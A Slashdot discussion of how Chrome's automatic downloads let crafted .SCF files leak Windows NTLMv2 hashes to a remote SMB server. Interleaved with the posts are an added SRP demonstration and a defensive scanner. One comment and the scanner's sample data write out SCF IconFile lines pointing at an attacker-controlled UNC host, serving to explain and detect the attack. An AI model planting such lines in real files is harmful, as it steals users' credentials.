Stealing Windows Credentials Using Google Chrome (helpnetsecurity.com)
Orome1 writes:
A default setting in Google Chrome, which allows it to download files that it deems safe without prompting the user for a download location, can be exploited by attackers to mount a Windows credential theft attack using specially-crafted SCF shortcut files, DefenseCode researchers have found. What's more, for the attack to work, the victim does not even have to run the automatically downloaded file. Simply opening the download directory in Windows File Explorer will trigger the code icon file location inserted in the file to run, and it will send the victim's username, domain and NTLMv2 password hash to a remote SMB server operated by the attackers.
Firewall Blocked (Score:5, Informative)
And this is EXACTLY why all of the LAN > WAN firewalls I manage have SMB/CIFS blocked. There is no reason to send that traffic over WAN. If it is needed for connection to a remote location, that's what a VPN connection is for.
Re: (Score:1)
Most home users at this point DO have firewalls. 1) OS level. 2) NATing routers.
Also, VPN isn't just what the usual spamervertised VPN services are (anonymized internet browsing). They started as a way for corporate employees to log into their private corporate LANs remotely over the internet. One method assigns a private LAN IP address to the remote machine, and tunnels that over the internet; another uses routing tables between two different private LANs tunneled over the internet. In either of these sit
Re: (Score:2)
NAT isn't a firewall, but most consumer routers at this point do have a stateful firewall.
A NAT device will drop non-internally initiated connection attempts unless the user has opened up ports to the inside (not many do) and somehow messed it up.
For purposes of this particular discussion, a NAT device can be lumped in with "firewall".
NTLM - the gift that keeps on giving (Score:2)
I can't get over the fact in 2017 Microsoft has yet to incorporate a single secure authentication protocol into any of its operating systems. They haven't even tried.
It would be relatively trivial to select a PAKE and make it backwards compatible with existing NT hash databases. They just don't seem to care.
Re: (Score:2)
They've been using Kerberos since like 1999. NTLM is there for backwards compatibility.
KERBEROS IS NOT A SECURE AUTHENTICATION PROTOCOL.
No, there is nothing wrong with my caps lock. I was intentionally shouting.
Re: (Score:3)
Different AC here; what are some examples of authentication protocols that you consider secure?
Any PAKE with a zero-knowledge proof, e.g. SRP, J-PAKE.
https://en.wikipedia.org/wiki/... [wikipedia.org]
Specifically, with regard to MS-CHAPv2 and Kerberos: to be secure, it MUST NOT be possible to use material from authentication challenges or responses to conduct an offline brute-force password guessing campaign, because the majority of user passwords are simply unable to withstand one.
I consider an authentication protocol to be secure if it is able to meet all of the following requirements:
1. Authenticating against an attacke
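The post above names SRP as the kind of PAKE that meets the "no offline guessing from the transcript" requirement, and an earlier post argues such a scheme could sit on top of an existing verifier database. The following is an added worked example, not code from either poster: a complete SRP-6a exchange in Python (register, ephemeral values, shared key, mutual proofs) with both sides' messages in one function so the on-the-wire transcript can be inspected. SHA-256 as the hash and the 127-bit Mersenne prime as the group modulus are assumptions made to keep the demo readable; a real deployment uses an RFC 5054 group and g = 2.

```python
"""SRP-6a exchange, added illustration for the PAKE discussion (not the posters' code)."""
import hashlib
import hmac
import secrets

# Toy group (assumption for the demo): N is prime but far too small for real use,
# and not a safe prime. Any prime N with generator g makes the arithmetic work.
N = 2**127 - 1
g = 3


def _h(*parts: bytes) -> bytes:
    m = hashlib.sha256()
    for p in parts:
        m.update(p)
    return m.digest()


def _int(b: bytes) -> int:
    return int.from_bytes(b, "big")


def _bytes(n: int) -> bytes:
    return n.to_bytes((n.bit_length() + 7) // 8 or 1, "big")


# Multiplier k = H(N || g), fixed per group in SRP-6a
k = _int(_h(_bytes(N), _bytes(g)))


def derive_x(identity: str, password: str, salt: bytes) -> int:
    """x = H(salt || H(I ':' P)). The server never stores x, only v = g^x mod N."""
    return _int(_h(salt, _h(f"{identity}:{password}".encode())))


def register(identity: str, password: str) -> dict:
    """Enrolment: the server keeps (salt, verifier); the password never reaches disk."""
    salt = secrets.token_bytes(16)
    return {"identity": identity, "salt": salt,
            "verifier": pow(g, derive_x(identity, password, salt), N)}


def exchange(record: dict, identity: str, password: str) -> dict:
    """One login attempt with both roles in-line. Returns each side's verdict plus
    everything an eavesdropper on the wire would have seen."""
    # Client: ephemeral secret a, public A = g^a
    a = secrets.randbelow(N - 2) + 1
    A = pow(g, a, N)

    # Server: ephemeral secret b, public B = k*v + g^b (g^b is blinded by the verifier)
    v = record["verifier"]
    b = secrets.randbelow(N - 2) + 1
    B = (k * v + pow(g, b, N)) % N
    if A % N == 0 or B % N == 0:
        raise ValueError("degenerate ephemeral value; SRP requires an abort here")

    # Both sides: scrambling parameter u from the two public values
    u = _int(_h(_bytes(A), _bytes(B)))
    if u == 0:
        raise ValueError("u must be nonzero")

    # Client: S = (B - k*g^x)^(a + u*x). Only the correct password turns B back into g^b.
    x = derive_x(identity, password, record["salt"])
    s_client = pow((B - k * pow(g, x, N)) % N, a + u * x, N)
    key_client = _h(_bytes(s_client))

    # Server: S = (A * v^u)^b, which equals g^(b(a+ux)) when the client used the same x
    s_server = pow((A * pow(v, u, N)) % N, b, N)
    key_server = _h(_bytes(s_server))

    # Proofs: the client proves first; the server only answers after a valid M1
    m1 = _h(_bytes(A), _bytes(B), key_client)
    server_accepts = hmac.compare_digest(m1, _h(_bytes(A), _bytes(B), key_server))
    m2 = _h(_bytes(A), m1, key_server) if server_accepts else b""
    client_accepts = server_accepts and hmac.compare_digest(m2, _h(_bytes(A), m1, key_client))

    return {
        "server_accepts": server_accepts,
        "client_accepts": client_accepts,
        # What crossed the wire: no password hash and nothing checkable against a
        # guessed password without knowing the ephemeral secret a or b.
        "transcript": {"I": identity, "s": record["salt"], "A": A, "B": B, "M1": m1, "M2": m2},
    }


if __name__ == "__main__":
    rec = register("alice", "correct horse battery staple")
    print("right password:", exchange(rec, "alice", "correct horse battery staple")["client_accepts"])
    print("wrong password:", exchange(rec, "alice", "correct horse battery stable")["client_accepts"])
```

Contrast this with the NTLM challenge/response the article is about: there the response is a function of the challenge and the password hash alone, so anyone holding the transcript can test guesses offline. In the SRP transcript above, M1 depends on a key that also needs one side's ephemeral secret, which is why the posters treat it as meeting their requirement.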
Re: NTLM - the gift that keeps on giving (Score:3)
The Kerberos *protocol* does, as far as I know, satisfy these requirements.
Can you provide any evidence of any implementation besides Microsoft's not satisfying the requirements in a typical configuration?
Yes, Microsoft's implementation of a Kerberos KDC seems to be broken due to having backwards-compatibility with NTLM, but that doesn't mean that the protocol itself is broken.
Re: (Score:2)
Yeah, AFAIK the Kerberos and IPsec protocols are secure. That doesn't mean the implementer didn't mess things up. I never heard any complaints about Kerberos on Linux and used it for years (albeit in the early 2000s, so not recently - for LDAP specifically). I've heard of multiple issues with it on Windows, though.
Re: (Score:2)
The Kerberos *protocol* does, as far as I know, satisfy these requirements.
Can you provide any evidence of any implementation besides Microsoft's not satisfying the requirements in a typical configuration?
The way people generally secure Kerberos is by deploying PKI (RFC 4556) or using any number of widely available transport-level privacy schemes (IPsec, VPNs, etc.); the very same options are widely available to shelter plaintext authentication.
The problem is that the challenge-response authentication algorithms provided with Kerberos themselves cannot stand alone. Kerberos cannot survive a brute-force attack without the communications channel first being protected by a foreign source of trust that isn't a password stor
Re: (Score:2)
They've been using Kerberos since like 1999. NTLM is there for backwards compatibility.
KERBEROS IS NOT A SECURE AUTHENTICATION PROTOCOL.
No, there is nothing wrong with my caps lock. I was intentionally shouting.
Please explain using terms appropriate to an audience that understands authentication protocols.
Re: (Score:2)
--Hey motherfucker, citation needed.
https://www.harmj0y.net/blog/p... [harmj0y.net]
Re: NTLM - the gift that keeps on giving (Score:2)
The problems here seem specific to Microsoft's implementation of Kerberos in their effort to retain backwards compatibility with NTLM.
"If we have an arbitrary SPN that is registered for a domain user account, then the NTLM hash of that user's account's plaintext password is used for the service ticket creation. This is the key to Kerberoasting."
"Tim realized that because of this, and because part of a TGS requested for an SPN instance is encrypted with the NTLM hash of a service account
Not a browser problem (Score:4, Insightful)
This is a Windows problem, not a Chrome problem. Windows shouldn't be sending out credentials unless it knows they belong to the server it's authenticating with. This is like visiting a random web page on the Internet and Chrome helpfully filling in the login box with your bank username and password.
Re: (Score:1)
How is automatically downloading random files to people's computers not a browser problem?
Re:Not a browser problem (Score:4, Insightful)
It'd be like saying that downloading a specially crafted PDF file that will compromise your computer when it's opened is a browser problem. Well, since opening Explorer to your downloads folder is a bit more innocuous, it's a bit worse than that.
Re:Not a browser problem (Score:5, Informative)
Mod parent (and GGP) up.
This is a Windows vulnerability in the way link files are handled, that is mischaracterised as a Chrome vulnerability by the author of the article.
Link files (.LNK and .SCF as well as autorun.inf and maybe others) do not contain the pretty icon that is shown in Windows Explorer, but contain a link address to the file containing the icon:
[Shell]
IconFile=MyPic.ico, or
IconFile=MyProgram.exe
This is the case that was originally targeted by the developers of Windows.
Then came network filesystems. Now, this would also work:
IconFile=\\MyServer\Dir\MyProgram.exe, or even worse:
IconFile=\\180.180.180.180\Dir\MyProgram.exe, where 180.180.180.180 is a server under control of the attacker.
When connecting to a server, Windows helpfully sends your current login credentials, to prevent you from having to re-type them every time.
Only when these do not work does it display a login prompt.
The catch is that, when you open the directory in which the file is stored in Explorer, the icon is needed for display, and the .scf file specifies an icon file on a remote server. So, Explorer accesses the remote server, and the underlying network file system sends your login credentials.
Google has tried to mitigate this problem by adding a .download extension to .LNK files, but had overlooked that .SCF can do exactly the same. Ultimately, this is not Google's fault. The Windows network system should not send login credentials to a server that the user hasn't authenticated to manually before, or should only use authentication mechanisms that are immune to replay attacks or brute forcing. See Wafflemonster's post [slashdot.org] above.
This is an issue that should be addressed by Microsoft for once and for all at the filesystem level, not by browser makers with patchwork on a case-by-case basis.
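The post above spells out the mechanism: an INI-style [Shell] section with an IconFile= value, and Explorer resolving that path (including a UNC path to a remote host) just to draw the icon. As an added example for defenders, not code from the poster, DefenseCode or Google, here is a Python scanner that parses that layout and flags any .SCF file (or autorun.inf, plus desktop.ini and .url files, which declare their icon the same way and are included here as an assumption about what else is worth checking) whose icon lives on a host the user is not expected to authenticate to. The sample file contents are constructed, and 192.0.2.10 is a documentation address standing in for the "server under control of the attacker" from the post.

```python
"""Scan a downloads folder for INI-style shortcut files whose icon lives on a remote host.

Added example for this thread; not DefenseCode's, Google's or the poster's code.
The [Shell] / IconFile= layout is the one quoted in the comment above.
"""
import os
import re
from typing import Dict, FrozenSet, List, Tuple

# .SCF and autorun.inf are named in the thread; desktop.ini and .url are other
# Windows files that declare their icon the same way (an assumption about scope).
ICON_BEARING_NAMES = {"desktop.ini", "autorun.inf"}
ICON_BEARING_EXTS = {".scf", ".url"}
ICON_KEYS = {"iconfile", "iconresource", "icon"}

_UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)")                       # \\host\share\...
_URL_RE = re.compile(r"^([a-z][a-z0-9+.-]*)://([^/\\]+)", re.I)   # scheme://host/...


def is_icon_bearing(filename: str) -> bool:
    name = os.path.basename(filename).lower()
    return name in ICON_BEARING_NAMES or os.path.splitext(name)[1] in ICON_BEARING_EXTS


def parse_icon_entries(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, raw value) for every icon key. Deliberately tolerant:
    a BOM, comments, duplicate keys and keys outside any section are all accepted,
    because a hostile file will not be tidy."""
    entries = []
    section = ""
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() in ICON_KEYS:
            entries.append((section, key.strip(), value.strip()))
    return entries


def normalise_icon_path(value: str) -> str:
    """Drop surrounding quotes and a trailing ',<index>' icon-resource selector."""
    v = value.strip().strip('"')
    head, sep, tail = v.rpartition(",")
    if sep and tail.strip().lstrip("-").isdigit():
        v = head
    return v.strip().strip('"')


def remote_host(path: str) -> str:
    """Host Explorer would contact to fetch this icon, or '' when the path is local."""
    m = _UNC_RE.match(path)
    if m:
        # \\?\ and \\.\ are local device-path prefixes, not network hosts
        return "" if m.group(1) in ("?", ".") else m.group(1)
    m = _URL_RE.match(path)
    return m.group(2) if m else ""   # file://host/share and similar count as remote


def scan_text(filename: str, text: str, allowed_hosts: FrozenSet[str] = frozenset()) -> List[Dict[str, str]]:
    """Findings for one file's contents. allowed_hosts lists lower-case servers the
    user authenticates to anyway (e.g. the corporate file server)."""
    findings: List[Dict[str, str]] = []
    if not is_icon_bearing(filename):
        return findings
    for section, key, raw in parse_icon_entries(text):
        target = normalise_icon_path(raw)
        host = remote_host(target)
        if host and host.lower() not in allowed_hosts:
            findings.append({"file": filename, "section": section, "key": key,
                             "target": target, "host": host})
    return findings


def scan_directory(root: str, allowed_hosts: FrozenSet[str] = frozenset()) -> List[Dict[str, str]]:
    """Walk a directory (e.g. the browser's download folder) and collect findings."""
    findings: List[Dict[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_icon_bearing(name):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(full, fh.read(), allowed_hosts))
            except OSError:
                continue
    return findings


# Constructed samples: a harmless SCF (icon inside a local binary) and one whose
# icon path would make Explorer open an SMB session to 192.0.2.10 just to render it.
SAMPLE_LOCAL_SCF = "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
SAMPLE_REMOTE_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\192.0.2.10\\share\\pic.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"

if __name__ == "__main__":
    for f in scan_text("picture.scf", SAMPLE_REMOTE_SCF):
        print(f"{f['file']}: {f['key']} points at remote host {f['host']} ({f['target']})")
```

Run `scan_directory` over the download folder from a scheduled task or an EDR custom rule; a hit is worth quarantining before Explorer ever lists the folder. This is a compensating control on the client, not a fix: the post's point stands that the real remedy is Windows not sending credentials (or using a replay- and brute-force-resistant scheme) to servers the user never chose, with SMB egress blocked at the perimeter in the meantime.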
Won't work on my setup (Score:2)
In my setup nothing is allowed internet access unless going through my proxy. Windows is not privy to what that proxy is... this effectively kills tons of exploits, and of course, Windows' own spyware.
It does limit me to software that can be configured to use a proxy, but that doesn't really bother me.